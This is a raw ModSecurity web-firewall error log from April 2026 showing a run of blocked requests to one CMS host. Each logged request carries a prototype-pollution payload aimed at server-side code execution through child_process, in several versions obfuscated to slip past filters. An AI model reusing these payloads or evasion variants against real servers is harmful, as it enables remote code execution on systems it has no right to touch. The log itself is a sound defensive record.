"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxLxQSOrq_iRTM7do9gAAAQM"] [Sun Apr 05 15:42:28.763180 2026] [:error] [pid 13019:tid 13263] [client 172.94.9.253:40818] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxLxQSOrq_iRTM7do-AAAARc"] [Sun Apr 05 15:42:28.763276 2026] [:error] [pid 13019:tid 13261] [client 172.94.9.253:40774] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxLxQSOrq_iRTM7do9wAAARU"] [Sun Apr 05 15:42:28.873745 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:40866] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxLxQSOrq_iRTM7do-gAAAQ0"] [Sun Apr 05 15:42:28.874087 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:40868] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxJc83uMXRUE9zvQSgQAAAcM"] [Sun Apr 05 15:42:28.875162 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:40850] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxJc83uMXRUE9zvQSggAAAcU"] [Sun Apr 05 15:42:28.875203 2026] [:error] [pid 1503:tid 1524] [client 172.94.9.253:40922] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxEI7AjfUQYCN-J7DWwAAAM8"] [Sun Apr 05 15:42:28.875349 2026] [:error] [pid 23077:tid 23092] [client 172.94.9.253:40864] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxJc83uMXRUE9zvQSgwAAAck"] [Sun Apr 05 15:42:28.876505 2026] [:error] [pid 1306:tid 1323] [client 172.94.9.253:40854] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxIRhslBlnapNAUOXkAAAAAY"] [Sun Apr 05 15:42:28.876592 2026] [:error] [pid 1503:tid 1521] [client 172.94.9.253:40906] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxEI7AjfUQYCN-J7DXAAAAMw"] [Sun Apr 05 15:42:28.876617 2026] [:error] [pid 1306:tid 1327] [client 172.94.9.253:40888] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxIRhslBlnapNAUOXkQAAAAo"] [Sun Apr 05 15:42:28.876976 2026] [:error] [pid 1306:tid 1317] [client 172.94.9.253:40900] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxIRhslBlnapNAUOXkgAAAAA"] [Sun Apr 05 15:42:28.877029 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:40910] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxJc83uMXRUE9zvQShAAAAcs"] [Sun Apr 05 15:42:28.951381 2026] [:error] [pid 23077:tid 23104] [client 172.94.9.253:40970] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxJc83uMXRUE9zvQShQAAAdU"] [Sun Apr 05 15:42:28.951407 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:41014] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxLxQSOrq_iRTM7do_AAAARY"] [Sun Apr 05 15:42:28.959848 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:40946] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxLxQSOrq_iRTM7do_QAAAQs"] [Sun Apr 05 15:42:28.960300 2026] [:error] [pid 13019:tid 13249] [client 172.94.9.253:40926] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxLxQSOrq_iRTM7do_gAAAQk"] [Sun Apr 05 15:42:28.960345 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:40980] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmxLxQSOrq_iRTM7do_wAAAQI"] [Sun Apr 05 15:42:28.960720 2026] [:error] [pid 23077:tid 23101] [client 172.94.9.253:41016] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxJc83uMXRUE9zvQShgAAAdI"] [Sun Apr 05 15:42:28.960794 2026] [:error] [pid 23077:tid 23105] [client 172.94.9.253:40948] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 